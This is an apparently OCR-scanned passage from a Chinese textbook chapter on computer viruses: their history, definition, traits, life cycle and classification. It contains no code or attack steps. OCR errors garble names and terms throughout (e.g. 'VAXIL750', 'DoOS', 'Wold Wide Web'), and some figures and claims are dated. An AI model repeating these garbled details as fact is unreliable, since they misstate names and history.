虽然 ， 计 算 机 病毒 的 起 源 是 否 归结 于 恶作剧 者 还 不 能 够 确定 ， 但 可 以 肯定 ， 世 界 上 流 
行 的 许多 计算 机 病毒 都 是 恶作剧 的 产物 。 

3) ”游戏 程序 起 源 说 

十 几 年 前 ， 计 算 机 在 社会 上 还 没有 得 到 广泛 的 普及 应 用 ， 美 国 贝 尔 实验 室 的 程序 员 为 
了 娱乐 , 在 自己 实验 室 的 计算 机 上 编制 了 吃 掉 对 方程 序 的 程序 , 看 谁 先 把 对 方 的 程序 吃 光 。 
有 人 认为 这 是 世界 上 第 一 个 计算 机 病毒 ， 但 这 只 是 一 个 猜想 而 已 。 

制造 计算 机 病毒 的 罪魁 祸首 到 底 是 谁 ， 到 目前 为 止 ， 依 然 众 说 纷 纸 。1983 年 11 月 3 
日 美国 计算 机 专家 弗 莱 德 。 科恩 在 美国 国家 计算 机 安全 会 议 上 ， 演 示 了 他 研制 的 一 种 在 运 
行 过 程 中 可 以 复制 自身 的 破坏 性 程序 ， 沦 ， 艾 德 勒 曼 将 它 命名 为 计算 机 病毒 ， 并 在 每 周 召 
开 一 次 的 计算 机 安全 讨论 会 上 正式 提出 来 ，8 小 时 后 专家 们 在 VAXIL750 计算 机 系统 上 运 
行 ， 第 一 个 病毒 实验 成 功 。 一 周 后 获准 进行 实验 演示 ， 从 而 在 实验 上 证 实 了 计算 机 病毒 的 
存在 ， 这 就 是 世界 上 第 一 例 被 证 实 的 计算 机 病毒 。 

病毒 的 发 展 史 呈 现 一 定 的 规律 性 , 一 般 情况 是 新 的 病毒 技术 出 现 后 ,病毒 会 迅速 发 展 ， 
接着 反 病毒 技术 的 发 展会 抑制 其 流传 。 操 作 系 统 升 级 后 ， 病 毒 也 会 调整 为 新 的 方式 ， 产 生 
新 的 病毒 技术 。 它 可 划分 为 以 下 几 个 阶段 : 

1) DoOS 引导 阶段 

1987 年 ， 计 算 机 病毒 主要 是 引导 型 病毒 ， 具 有 代表 性 的 是 “小 球 ” 和 “石头 ”病毒 。 
当时 的 计算 机 硬件 较 少 ， 功 能 简单 ， 一 般 需 要 通过 软盘 启动 后 使 用 。 引 导 型 病毒 利用 软盘 
的 启动 原理 工作 ， 修 改 系统 启动 扇 区 ， 在 计算 机 启动 时 首先 取得 控制 权 ， 减 少 系统 内 存 ， 
修改 磁盘 读 写 中 断 ， 影 响 系 统 工 作 效 率 ， 在 系统 存 取 磁 盘 时 进行 传播 。1989 年 ， 引 导 型 病 
毒 发 展 为 可 以 感染 硬盘 ， 典 型 的 代表 有 “石头 2”。 

2) ”DOS 可 执行 阶段 

1989 年 ， 可 执行 文件 型 病毒 出 现 ， 它 们 利用 DOS 系统 加 载 执行 文件 的 机 制 工作 。 具 
有 代表 性 的 有 “耶路撒冷 ”、“ 星 期 天 ”病毒 ， 其 代码 在 系统 执行 文件 时 取得 控制 权 ， 修 
改 DOS 中 断 ， 在 系统 调用 时 进行 传染 ， 并 将 自己 附加 在 可 执行 文件 中 ， 使 文件 长 度 增加 。 
1990 年 ， 发 展 为 复合 型 病毒 ， 可 感染 COM 和 EXE 文件 。 
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3) ”伴随 、 批 次 型 阶段 

1992 年 ， 伴 随 型 病毒 出 现 ， 伴 随 型 病毒 利用 DOS 加 载 文件 的 优先 顺序 进行 工作 。 具 
有 代表 性 的 是 “ 金 蝉 ”病毒 , 它 感染 EXE 文件 时 生成 一 个 和 EXE 同名 但 扩展 名 为 COM 的 
伴随 体 。 这 类 病毒 的 特点 是 不 改变 原来 的 文件 内 容 、 日 期 及 属性 。 在 非 DOS 操作 系统 中 ， 
一 些 伴随 型 病毒 利用 操作 系统 的 描述 语言 进行 工作 ， 具 有 典型 代表 的 是 “海盗 旗 ” 病 毒 ， 
它 在 得 到 执行 时 ， 询 问 用 户 名 称 和 口令 ， 然 后 返回 一 个 出 错 信息 ， 将 自身 删除 。 批 次 型 病 
毒 是 在 DOS 下 工作 ， 和 “海盗 旗 ” 病 毒 相 同 。 

4) ”幽灵 、 多 形 阶 段 

1994 年 ， 随 着 汇编 语言 的 发 展 ， 实 现 同一 功能 可 以 用 不 同 的 方式 进行 完成 ， 这 些 方式 
的 组 合 使 一 段 看 似 随机 的 代码 产生 相同 的 运算 结果 。 幽 灵 病 毒 就 是 利用 这 个 特点 ， 感 染 一 
次 就 产生 不 同 的 代码 。 例 如 “一 半 ” 病 毒 就 能 产生 一 段 有 上 亿 种 可 能 的 解码 运算 程序 ， 病 
毒 体 被 隐藏 在 解码 前 的 数据 中 。“ 多 形 型 ”病毒 是 一 种 综合 性 病毒 ， 它 既 能 感染 引导 区 又 
能 感染 程序 区 ， 多 数 具 有 解码 算法 ， 这 种 病毒 往往 要 两 段 以 上 的 子 程序 方 能 解除 。 

5) ”生成 器 、 变 体 机 阶段 

1995 年 ， 在 汇编 语言 中 ， 一 些 数据 的 运算 放 在 不 同 的 通用 寄存 器 中 ， 可 运算 出 同样 的 
结果 ， 随 机 的 插入 一 些 空 操作 和 无 关 指令 ， 也 不 影响 运算 的 结果 ， 这 样 ， 一 段 解码 算法 就 
可 以 由 生成 器 生成 ， 当 生成 器 的 生成 结果 为 病毒 时 ， 就 产生 了 这 种 复杂 的 “病毒 生成 器 ”。 
变 体 机 就 是 增加 解码 复杂 程度 的 指令 生成 机 制 , 这 一 阶段 的 典型 代表 是 “病毒 制造 机 ”VCL， 
它 可 以 在 瞬间 制造 出 成 千 上 万 种 不 同 的 病毒 。 

6) 网络、 蠕虫 阶 段 

1995 年 ， 随 着 网 络 的 普及 ， 病 毒 开始 利用 网 络 进行 传播 ， 它 们 只 是 以 上 几 代 病毒 的 改 
进 。 在 非 DOS 操作 系统 中 ，“ 蠕 虫 ” 是 典型 的 代表 ， 它 不 占用 除 内存 以 外 的 任何 资源 ， 不 
修改 磁盘 文件 ， 利 用 网 络 功 能 搜索 网 络 地 址 ， 将 自身 向 下 一 个 地 址 进行 传播 ， 有 时 也 在 网 
络 服务 器 和 启动 文件 中 存在 。 

7) ”视窗 阶段 

1996 年 ， 随 着 Windows 和 Windows 95 的 日 益 普及 , 利用 Windows 进行 工作 的 病毒 开 
始 发 展 ， 它 们 修改 NE，PE) 文 件 ， 典 型 的 代表 是 DS.3873， 这 类 病毒 的 机 制 更 为 复杂 ， 它 
们 利用 保护 模式 和 API 调用 接口 工作 ， 解 除 方法 也 比较 复杂 。 安 病毒 阶段 ，1996 年 ， 随 着 
Windows Word 功能 的 增强 ， 使 用 Word 宏 语言 也 可 以 编制 病毒 ， 这 种 病毒 使 用 类 Basic 语 
言 ， 编 写 容易 ， 感 染 Word 文档 等 文件 。 在 Excel 和 AmiPro 出 现 的 相同 工作 机 制 的 病毒 也 
属于 此 类 。 

8) ”互联 网 阶段 

1997 年 ， 随 着 因特网 的 发 展 ， 各 种 病毒 也 开始 利用 因特网 进行 传播 ， 一 些 携带 病毒 的 
数据 包 和 邮件 越 来 越 多 ， 如 果 不 小 心 打开 了 这 些 邮件 ， 机 器 就 有 可 能 中 毒 。 

9) “爪哇 (ava)、 邮 件 炸 弹 阶 段 

1997 年 ， 随 着 万 维 网 (Wold Wide Web) 上 Java 的 普及 ， 利 用 Java 语言 进行 传播 和 资料 
获取 的 病毒 开始 出 现 ， 典 型 的 代表 是 Java Snake 病毒 ， 还 有 一 些 利用 邮件 服务 器 进行 传播 
和 破坏 的 病毒 ， 例 如 Mail-Bomb 病毒 ， 它 会 严重 影响 因特网 的 效率 。 
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4.1.2 ”计算 机 病毒 的 定义 及 特征 


计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 计 算 机 病毒 的 根本 属性 是 
自我 复制 和 破坏 性 。 

1. 计算 机 病毒 的 定义 


计算 机 病毒 (Computer Virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 被 
明确 定义 ， 病 毒 指 “编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

2. 计算 机 病毒 的 产生 

病毒 不 是 来 源 于 突 发 或 偶然 的 原因 。 一 次 突 发 的 停电 和 偶然 的 错误 ， 会 在 计算 机 的 磁 
盘 和 内 存 中 产生 一 些 乱 码 和 随机 指令 ， 但 这 些 代码 是 无 序 和 混乱 的 ， 病 毒 则 是 一 种 比较 完 
美 、 精 巧 、 严 说 的 代码 ， 按 照 严 格 的 秩序 组 织 起 来 ， 与 所 在 的 系统 网 络 环境 相 适应 和 配合 
起 来 。 病 毒 不 会 通过 偶然 形成 ， 并 且 需 要 有 一 定 的 长 度 ， 这 个 基本 的 长 度 从 概率 上 来 讲 是 
不 可 能 通过 随机 代码 产生 的 。 病 毒 是 人 为 的 特制 程序 ， 多 数 病毒 可 以 找到 作者 信息 和 产地 
信息 ， 通 过 大 量 的 资料 分 析 统 计 来 看 ， 病 毒 作者 的 主要 情况 和 目的 是 : 一 些 天 才 的 程序 员 
为 了 表现 自己 和 证 明 自 己 的 能 力 、 处 于 对 上 司 的 不 满 、 为 了 好 奇 、 为 了 报复 、 为 了 祝贺 和 
求爱 、 为 了 得 到 控制 口令 、 为 了 软件 拿 不 到 报酬 预 留 的 陷阱 等 等 ， 当 然 也 有 因 政 治 、 军 事 、 
宗教 、 民 族 、 专 利 等 方面 的 需求 而 专门 编写 的 ， 其 中 也 包括 一 些 病毒 研究 机 构 和 黑客 的 测 
试 病毒 。 

3. 计算 机 病毒 的 特点 


计算 机 病毒 是 人 为 的 特制 程序 ， 具 有 自我 复制 能 力 、 很 强 的 感染 性 、 一 定 的 潜伏 性 、 
特定 的 触发 性 和 很 大 的 破坏 性 。 计 算 机 的 信息 需要 存 取 、 复 制 与 传送 。 病 毒 作为 信息 的 一 
种 形式 可 以 随 之 繁殖 、 感 染 和 破坏 ， 而 当 病 毒 取 得 控制 权 之 后 ， 他 们 会 主动 寻找 感染 目标 ， 
使 自身 广 为 流 传 。 

1) “计算 机 病毒 的 程序 性 (可 执行 性 ) 

计算 机 病毒 与 其 他 合法 程序 一 样 ， 是 一 段 可 执行 程序 ， 但 它 不 是 一 个 完整 的 程序 ， 而 
是 寄生 在 其 他 可 执行 程序 上 ， 因 此 它 享 有 一 切 程序 所 能 得 到 的 权力 。 在 病毒 运行 时 ， 与 合 
法 程序 争夺 系统 的 控制 权 。 计 算 机 病毒 只 有 当 它 在 计算 机 内 得 以 运行 时 ， 才 具有 传染 性 和 
破坏 性 等 活性 ， 也 就 是 说 计算 机 CPU 的 控制 权 是 关键 问题 。 若 计算 机 在 正常 程序 控制 下 运 
行 ， 而 不 运行 带 病毒 的 程序 ， 则 这 人 台 计 算 机 总 是 可 靠 的 。 在 这 人 台 计 算 机 上 可 以 查看 病毒 文 
件 的 名 字 ， 查 看 计算 机 病毒 的 代码 ， 打 印 病毒 的 代码 ， 甚 至 复制 病毒 程序 ， 却 都 不 会 感染 
病毒 。 反 病毒 技术 人 员 整 天 就 是 在 这 样 的 环境 下 工作 ， 他 们 的 计算 机 虽 也 存 有 各 种 计算 机 
病毒 的 代码 , 但 已 置 这 些 病 毒 于 控制 之 下 ,计算 机 不 会 运行 病毒 程序 ， 整 个 系统 是 安全 的 。 
相反 ， 计 算 机 病毒 一 经 在 计算 机 上 运行 ， 在 同一 台 计算 机 内 病毒 程序 与 正常 系统 程序 或 某 
种 病毒 与 其 他 病毒 程序 争夺 系统 控制 权时 ， 往 往 会 造成 系统 崩溃 ， 导 致 计算 机 瘫痪 。 反 病 
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毒 技 术 就 是 要 提前 取得 计算 机 系统 的 控制 权 ， 识 别 出 计 算 机 病毒 的 代码 和 行为 ， 阻 止 其 取 
得 系统 控制 权 ， 反 病毒 技术 的 优 劣 就 是 体现 在 这 一 点 上 。 一 个 好 的 抗 病 毒 系统 应 该 不 仅 能 
可 靠 地 识别 出 已 知 计算 机 病毒 的 代码 ， 阻 止 其 运行 ， 还 应 该 识别 出 未 知 计算 机 病毒 在 系统 
内 的 行为 ， 阻 止 其 传染 和 破坏 系统 的 行动 。 

2) ”计算 机 病毒 的 传染 性 

计算 机 病毒 通过 各 种 渠道 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 ， 在 某 些 情况 
下 会 造成 被 感染 的 计算 机 工作 失常 甚至 瘫痪。 计算机 病毒 是 一 段 人 为 编制 的 计算 机 程序 代 
码 ， 这 段 程序 代码 一 旦 进入 计算 机 并 得 以 执行 ， 它 就 会 搜索 其 他 符合 其 传染 条 件 的 程序 或 
存储 介质 ， 确 定 目标 后 再 将 自身 代码 插入 其 中 ， 达 到 自我 繁殖 的 目的 。 只 要 一 台 计算 机 染 
毒 ， 如 不 及 时 处 理 ， 那 么 病毒 会 在 这 人 台 机 子 上 迅速 扩散 ， 其 中 的 大 量 文件 (一 般 是 可 执行 文 
件 ) 会 被 感染 。 而 被 感染 的 文件 又 成 了 新 的 传染 源 ， 它 在 与 其 他 机 器 进行 数据 交换 或 通过 网 
络 接触 ， 病 毒 会 继续 进行 传染 。 
正常 的 计算 机 程序 一 般 是 不 会 将 自身 的 代码 强行 连接 到 其 他 程序 上 的 ， 而 病毒 却 能 使 
自身 的 代码 强行 传染 到 一 切 符合 其 传染 条 件 的 未 受到 传染 的 程序 上 。 计 算 机 病毒 可 通过 各 
种 可 能 的 渠道 ， 如 癌 盘 、 计 算 机 网 络 去 传染 其 他 的 计算 机 。 当 在 一 台 机 器 上 发 现 病毒 时 ， 
往往 曾 在 这 人 台 计 算 机 上 用 过 的 软盘 已 被 感染 了 病毒 ， 而 与 这 台 机 器 相 联网 的 其 他 计算 机 可 
能 也 染 上 了 该 病毒 。 是 否 具有 传染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 病 
毒 程序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 并 把 自身 嵌入 其 中 以 达到 病毒 的 传染 和 扩散 ， 被 
嵌入 的 程序 叫做 宿主 程序 。 

3) ”计算 机 病毒 的 潜伏 性 

计算 机 病毒 程序 进入 系统 之 后 不 会 马上 发 作 ， 可 以 在 几 周 或 者 几 个 月 甚至 几 年 内 隐藏 
在 合法 文件 中 ， 对 其 他 系统 进行 传染 ， 而 不 被 人 发 现 ;潜伏 性 越 好 ， 其 在 系统 中 的 存在 时 
间 就 会 越 长， 病毒 的 传染 范围 就 会 越 大 。 

潜伏 性 的 第 一 种 表现 是 指 : 病毒 程序 不 用 专用 检测 程序 是 检查 不 出 来 的 。 因 此 病毒 可 
以 静 静 地 躲 在 磁盘 或 磁带 里 采 上 几 天 ， 甚 至 几 年 ， 一 旦 时 机 成 熟 ， 得 到 运行 机 会 ， 就 要 四 
处 繁殖 、 扩 散 。 潜 伏 性 的 第 二 种 表现 是 指 : 计算 机 病毒 的 内 部 往往 有 一 种 触发 机 制 ， 不 满 
是 触发 条 件 时 ， 计 算 机 病毒 除了 传染 外 不 做 什么 破坏 。 触 发 条 件 一 旦 得 到 满足 ， 就 会 发 作 。 
表现 各 不 相同 ， 有 的 在 屏幕 上 显示 信息 、 图 形 或 特殊 标识 ， 有 的 则 执行 破坏 系统 的 操作 ， 
如 格式 化 磁盘 、 删 除 磁 盘 文 件 、 对 数据 文件 做 加 密 、 封 锁 键盘 以 及 使 系统 死 锁 等 。 

4” 计算 机 病毒 的 可 触发 性 

病毒 因 某 个 事件 或 数值 的 出 现 ， 诱 使 病毒 实施 感染 或 进行 攻击 的 特性 称 为 可 触发 性 。 
为 了 隐蔽 自己 ,病毒 必须 潜伏 ， 少 做 动作 。 如 果 完 全 不 动 ， 一 直 潜 伏 的 话 ， 病 毒 既 不 能 感 
染 也 不 能 进行 破坏 ， 便 失去 了 杀伤 力 。 病 毒 既 要 隐蔽 又 要 维持 杀伤 力 ， 它 必须 具有 可 触发 
性 。 病 毒 的 触发 机 制 就 是 用 来 控制 感染 和 破坏 动作 的 频率 。 病 毒 具有 预定 的 触发 条 件 ， 这 
些 条件 可 能 是 时 间 、 日 期 、 文 件 类 型 或 菜 些 特定 数据 等 。 病 毒 运行 时 ， 触 发 机 制 检查 预定 
条 件 是 否 满足 ， 如 果 满 足 ， 启 动感 染 或 破坏 动作 ， 使 病毒 进行 感染 或 攻击 ;如 果 不 满足 则 
使 病毒 继续 潜伏 。 

5) 计算 机 病毒 的 破坏 性 

所 有 的 计算 机 病毒 都 是 一 种 可 执行 程序 ， 而 这 一 可 执行 程序 又 必然 要 运行 ， 所 以 对 系 
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统 来 讲 ， 所 有 的 计算 机 病毒 都 存在 一 个 共同 的 危害 ， 即 降低 计算 机 系统 的 工作 效率 ， 占 用 
系统 资源 ， 其 具体 情况 取决 于 入 侵 系统 的 病毒 程序 。 同 时 计算 机 病毒 的 破坏 性 主要 取决 于 
计算 机 病毒 设计 者 的 目的 ， 如 果 病 毒 设计 者 的 目的 在 于 彻底 破坏 系统 的 正常 运行 的 话 ， 那 
么 这 种 病毒 对 于 计算 机 系统 进行 攻击 造成 的 后 果 是 难以 设想 的 ， 它 可 以 毁 掉 系统 的 部 分 数 
据 ， 也 可 以 破坏 全 部 数据 并 使 之 无 法 恢复 。 但 并 非 所 有 的 病毒 都 对 系统 产生 极其 恶劣 的 破 
坏 作 用 。 有 时 几 种 本 没有 多 大 破坏 作用 的 病毒 交叉 感 当 ， 也 会 导致 系统 崩溃 等 重大 恶果 。 

6) ”病毒 攻击 的 主动 性 

病毒 对 系统 的 攻击 是 主动 的 , 不 以 人 的 意志 为 转移 的 。 也 就 是 说 ， 从 一 定 的 程度 上 讲 ， 
计算 机 系统 无 论 采 取 多 么 严密 的 保护 措施 都 不 可 能 彻底 地 排除 病毒 对 系统 的 攻击 ， 而 保护 
措施 也 就 是 一 种 预防 的 手段 而 已 。 

7) “病毒 的 针对 性 

计算 机 病毒 是 针对 特定 的 计算 机 和 特定 的 操作 系统 的 。 例 如 ， 有 针对 IBM PC 机 及 其 
兼容 机 的 ， 有 针对 Apple 公司 的 Macintosh 的 ， 还 有 针对 UNIX 操作 系统 的 。 

8) ”病毒 的 非 授 权 性 

病毒 未 经 授权 而 执行 。 一 般 正 常 的 程序 是 由 用 户 调用 ， 再 由 系统 分 配 资源 ， 完 成 用 户 
交 给 的 任务 ， 其 目的 对 用 户 是 可 见 的 、 透 明 的 。 而 病毒 具有 正常 程序 的 一 切 特性 ， 它 隐藏 
在 正常 程序 中 ， 当 用 户 调用 正常 程序 时 它 窃取 到 系统 的 控制 权 ， 先 于 正常 程序 执行 ， 病 毒 
的 动作 、 目 的 对 用 户 是 未 知 的 ， 是 未 经 用 户 人 允许 的 。 

9) “病毒 的 隐蔽 性 

病毒 一 般 是 具有 很 高 的 编程 技巧 、 短 小 精 悍 的 程序 。 通 常 附 在 正常 程序 中 或 磁盘 较 隐 
蔽 的 地 方 ， 也 有 个 别 的 以 隐 含 文件 形式 出 现 ， 目 的 是 不 让 用 户 发 现 它 的 存在 。 如 果 不 经 过 
代码 分 析 ， 病 毒 程序 与 正常 程序 是 不 容易 区 别 开 来 的 。 一 般 在 没有 防护 措施 的 情况 下 ， 计 
算 机 病毒 程序 取得 系统 控制 权 后 ， 可 以 在 很 短 的 时 间 里 传染 大 量程 序 。 而 且 受 到 传染 后 ， 
计算 机 系统 通常 仍 能 正常 运行 ， 使 用 户 不 会 感到 任何 异常 ， 好 像 不 曾 在 计算 机 内 发 生 过 什 
么 一 样 。 试 想 ， 如 果 病 毒 在 传染 到 计算 机 上 之 后 ， 机 器 马上 无 法 正常 运行 ， 那 么 它 本 身 便 
无 法 继续 进行 传染 了 。 正 是 由 于 隐蔽 性 ， 计 算 机 病毒 得 以 在 用 户 没有 察觉 的 情况 下 扩散 并 
运行 在 计算 机 中 。 大 部 分 的 病毒 的 代码 之 所 以 设计 得 非常 短小 ， 也 是 为 了 隐藏 。 

计算 机 病毒 的 隐蔽 性 表现 在 两 个 方面 : 

(1) 传染 的 隐蔽 性 。 

大 多 数 病毒 在 进行 传染 时 速度 是 极 快 的 ， 一 般 不 具有 外 部 表现 ， 不 易 被 人 发 现 。 确 实 
有 些 病 毒 时 不 时 在 屏幕 上 显示 一 些 图 案 或 信息 ， 或 演奏 一 段 乐曲 ， 往 往 此 时 那 台 计算 机 内 
已 有 许多 病毒 的 复制 了 。 许 多 计算 机 用 户 对 计算 机 病毒 没有 任何 概念 ， 他 们 见 到 这 些 新 奇 
的 屏幕 显示 和 音响 效果 ， 还 以 为 是 来 自 计算 机 系统 的 ， 而 没有 意识 到 这 些 病 毒 正 在 损害 计 
算 机 系统 ， 正 在 制造 灾难 。 

(2) 病毒 程序 存在 的 隐蔽 性 。 

一 般 的 病毒 程序 都 夹 在 正常 程序 之 中 ， 很 难 被 发 现 ， 而 一 旦 病毒 发 作出 来 ， 往 往 已 经 
给 计算 机 系统 造成 了 不 同 程度 的 破坏 。 被 病毒 感染 的 计算 机 在 多 数 情 况 下 仍 能 维持 其 部 分 
功能 ， 不 会 由 于 刚 被 感染 上 病毒 ， 整 台 计算 机 就 不 能 启动 了 ， 或 者 某 个 程序 一 被 病毒 所 感 
染 ， 就 被 损坏 得 不 能 运行 了 。 正 常 程 序 被 计算 机 病毒 感染 后 ， 其 原 有 功能 基本 上 不 受 影响 ， 
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病毒 代码 附 于 其 上 而 得 以 存活 ， 得 以 不 断 地 得 到 运行 的 机 会 ， 去 传染 出 更 多 的 复制 体 ， 与 
正常 程序 争夺 系统 的 控制 权 和 磁盘 空间 ， 不 断 地 破坏 系统 ， 导 致 整个 系统 的 瘫痪 。 

10) 病毒 的 衍生 性 

分 析 计 算 机 病毒 的 结构 可 知 ， 传 染 的 破坏 部 分 反映 了 设计 者 的 设计 思想 和 设计 目的 。 
但 是 ， 这 可 以 被 其 他 掌握 原理 的 人 以 其 个 人 的 企图 进行 任意 改动 ， 从 而 又 衍生 出 一 种 不 同 
于 原版 本 的 新 的 计算 机 病毒 (又 称 为 变种 )， 这 就 是 计算 机 病毒 的 衍生 性 。 这 种 变种 病毒 造 
成 的 后 果 可 能 比 原 版 病毒 严重 得 多 。 

11) 病毒 的 寄生 性 (依附 性 ) 

病毒 程序 柑 入 到 宿主 程序 中 ， 依 赖 于 宿主 程序 的 执行 而 生存 ， 这 就 是 计算 机 病毒 的 寄 
生性 。 病 毒 程序 在 侵入 到 宿主 程序 中 后 ， 一 般 对 宿主 程序 进行 一 定 的 修改 ， 宿 主 程序 一 旦 
执行 ， 病 毒 程序 就 被 激活 ， 从 而 可 以 进行 自我 复制 和 繁衍 。 

12) 病毒 的 持久 性 

即使 病毒 程序 被 发 现 以 后 ， 数 据 和 程序 以 至 操作 系统 的 恢复 都 非常 困难 。 特 别 是 在 网 
络 操作 情况 下 ， 由 于 病毒 程序 由 一 个 受 感染 的 复制 通过 网 络 系统 反复 传播 ， 使 得 病毒 程序 
的 清除 非常 复杂 。 


4.1.3 ”计算 机 病毒 的 生命 周期 
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计算 机 病毒 的 产生 过 程 可 分 为 : 程序 设计 一 传播 一 潜伏 一 触发 一 运行 一 
算 机 病毒 的 生命 周期 从 生成 开始 到 完全 根除 结束 。 

下 面 介 绍 病毒 生命 周期 的 各 个 时 期 。 

1) 开发 期 

在 几 年 前 ， 制 造 一 个 病毒 需要 计算 机 编程 语言 的 知识 。 但 是 今天 有 一 点 计算 机 编程 知 
识 的 人 都 可 以 制造 一 个 病毒 。 通 常 计算 机 病毒 是 一 些 误 入 歧途 的 、 试 图 传播 计算 机 病毒 和 
破坏 计算 机 的 个 人 或 组 织 制造 的 。 

2) ”传染 期 

在 一 个 病毒 制造 出 来 后 ， 病 毒 的 编写 者 将 其 复制 并 确认 其 已 被 传播 出 去 。 通 常 的 办 法 
是 感染 一 个 流行 的 程序 , 再 将 其 放 入 BBS 站 点 上 、 校 园 和 其 他 大 型 组 织 当 中 分 发 其 复制 物 。 

3) ”潜伏 期 

病毒 是 自然 地 复制 的 。 一 个 设计 良好 的 病毒 可 以 在 它 活化 前 长 时 期 里 被 复制 ， 这 就 给 
了 它 充裕 的 传播 时 间 。 这 时 病毒 的 危害 在 于 暗中 占据 存储 空间 。 

4) 发 作 期 

带 有 破坏 机 制 的 病毒 会 在 遇 到 某 一 特定 条 件 时 发 作 ， 一 旦 遇 上 某 种 条 件 ， 病 毒 就 被 激 
活 了 。 没 有 感染 程序 的 病毒 属于 没有 激活 ， 这 时 病毒 的 危害 在 于 暗中 占据 存储 空间 。 

5) ”发 现 期 

当 一 个 病毒 被 检测 到 并 被 隔离 出 来 后 ， 它 被 送 到 计算 机 安全 协会 或 反 病 毒 厂 家 ， 在 那 
里 病毒 被 通报 和 描述 给 反 病 毒 研究 工作 者 。 通 常 发 现 病毒 是 在 病毒 成 为 计算 机 社会 的 灾难 
之 前 完成 的 。 
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6) 消化 期 

在 这 一 阶段 ， 反 病毒 开发 人 员 修改 他 们 的 软件 以 使 其 可 以 检测 到 新 发 现 的 病毒 。 这 段 
时 间 的 长 短 取决 于 开发 人 员 的 素质 和 病毒 的 类 型 。 

7) 消亡 期 

若是 所 有 用 户 安装 了 最 新 版 的 杀毒 软件 ， 那 么 任何 病毒 都 将 被 扫除 。 这 样 没有 什么 病 
毒 可 以 广泛 地 传播 ， 但 有 一 些 病毒 在 消失 之 前 有 一 个 很 长 的 消亡 期 。 至 今 ， 还 没有 哪 种 病 
毒 已 经 完全 消失 ， 但 是 某 些 病毒 已 经 在 很 长 时 间 里 不 再 是 一 个 重要 的 威胁 了 。 


4.1.4 计算 机 病毒 的 分 类 


据 统计 ， 目 前 世界 上 出 现 的 计算 机 病毒 种 类 繁多 ， 约 有 2000 多 种 ， 为 了 便于 分 析 和 检 
测 ， 根 据 多 年 对 计算 机 病毒 的 研究 ， 按 照 科 学 、 系 统 、 严 密 的 方法 ， 计 算 机 病毒 分 类 如 下 。 

1. 按 攻击 对 象 分 类 

若 按 病毒 攻击 的 对 象 来 分 类 ， 可 分 为 攻击 微型 计算 机 、 小 型 机 和 工作 站 的 病毒 ， 甚 至 
安全 措施 很 好 的 大 型 机 及 计算 机 网 络 也 是 病毒 攻击 的 目标 。 这 些 攻 击 对 象 之 中 ， 以 攻击 微 
型 计算 机 的 病毒 最 多 ， 其 中 90% 是 攻击 IBM PC 及 其 兼容 机 的 。 其 他 还 有 攻击 Macintosh 
及 Amiga 计算 机 的 。 

2. 按 入 侵 途 径 分 类 

按 计 算 机 病毒 浸入 系统 的 途径 ， 征 型 计算 机 的 病毒 大 致 可 分 为 4 类 : 

1) ”操作 系统 病毒 

小 球 病毒 和 大 麻 病 毒 就 属于 典型 的 操作 系统 病毒 。 这 类 病毒 用 病毒 本 身 的 程序 意图 加 
入 或 替代 部 分 操作 系统 进行 工作 。 操作 系统 病毒 是 常见 的 计算 机 病毒 ， 具 有 很 强 的 破坏 力 。 
这 是 因为 整个 计算 机 是 在 操作 系统 的 控制 之 下 运行 。 该 类 病毒 的 入 侵 造成 病毒 程序 对 系统 
持续 不 断 的 攻击 。 严 重 时 ， 可 导致 整个 系统 的 瘫痪 。 

一 般 操作 系统 类 病毒 ， 当 系统 引导 时 就 把 病毒 程序 从 磁盘 上 装 入 内 存 中 ， 在 系统 运行 
时 ， 不 断 捕 捉 CPU 的 控制 权 ， 进 行 计算 机 病毒 的 扩散 。 

2) ”外 过 病毒 

这 类 病毒 常 附 在 宿主 程序 的 首尾 ， 一 般 对 源 程序 不 进行 修改 。 外 过 程序 较 常 见 ， 大 约 
有 半数 左右 的 计算 机 病毒 采用 这 种 方式 来 传播 病毒 的 。 外 过 病毒 容易 编写 ， 也 易于 检测 ， 
一 般 测试 可 执行 文件 的 长 度 就 可 找到 。 对 于 IBM PC 及 其 兼容 机 ， 外 过 病毒 一 般 感染 DOS 
下 的 可 执行 程序 。 

3) ”源码 病毒 

源码 类 病毒 在 程序 被 编译 之 前 插入 到 用 FORTRAN、PASCAL、C 或 COBOL 等 语言 
制 的 源 程序 之 中 。 源 码 病毒 往往 隐藏 在 大 型 程序 之 中 。 一 旦 插入 到 大 型 程序 中 其 破坏 力 和 
危害 性 是 很 大 的 。 

在 当前 国际 上 流行 的 计算 机 病毒 中 ， 源 码 病 毒 较为 少见 ， 编 写 源码 病毒 程序 的 难度 较 
大 ， 受 病毒 程序 感染 的 程序 对 象 也 有 一 定 的 限制 。 
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4) ”入 侵 病 毒 

入 侵 类 病毒 浸入 到 主 程序 之 中 ， 并 替代 主 程序 中 部 分 不 常用 到 的 功能 模块 或 堆栈 区 。 
当 入 侵 病 毒 进 入 到 主 程序 后 ， 不 破坏 主 程序 就 难以 除去 病毒 程序 。 

入 侵 病毒 难以 编写 。 这 类 病毒 一 般 是 针对 某 些 特定 程序 而 编写 的 。 

3. 按 传染 方式 分 类 

按 传 染 方式 分 类 ， 微 型 机 的 病毒 可 分 为 下 述 3 类 。 

1) ”传染 磁盘 引导 区 的 病毒 

每 种 病毒 都 有 自身 特定 的 寄生 宿主 。 传 染 磁盘 引导 区 的 计算 机 病毒 的 寄生 宿主 就 是 
DOS 的 磁盘 引导 程序 。 对 软盘 来 说 ， 引 导 程 序 只 有 DOS 的 BOOT 区 引导 程序 。 而 对 于 硬 
盘 ， 有 传染 硬盘 主 引导 程序 的 计算 机 病毒 和 传染 硬盘 DOS 分 区 中 BOOT 区 引导 程序 。 

2) ”传染 可 执行 文件 的 病毒 

(1) 传染 操作 系统 文件 的 病毒 。 

这 类 病毒 传染 操作 系统 运行 时 所 必需 的 文件 ,如 传染 PC-DOS 操作 系统 中 的 IBM BIO、 
COM、IBM DOS、COM 及 COMMAND、COM 等 操作 系统 核心 文件 。 

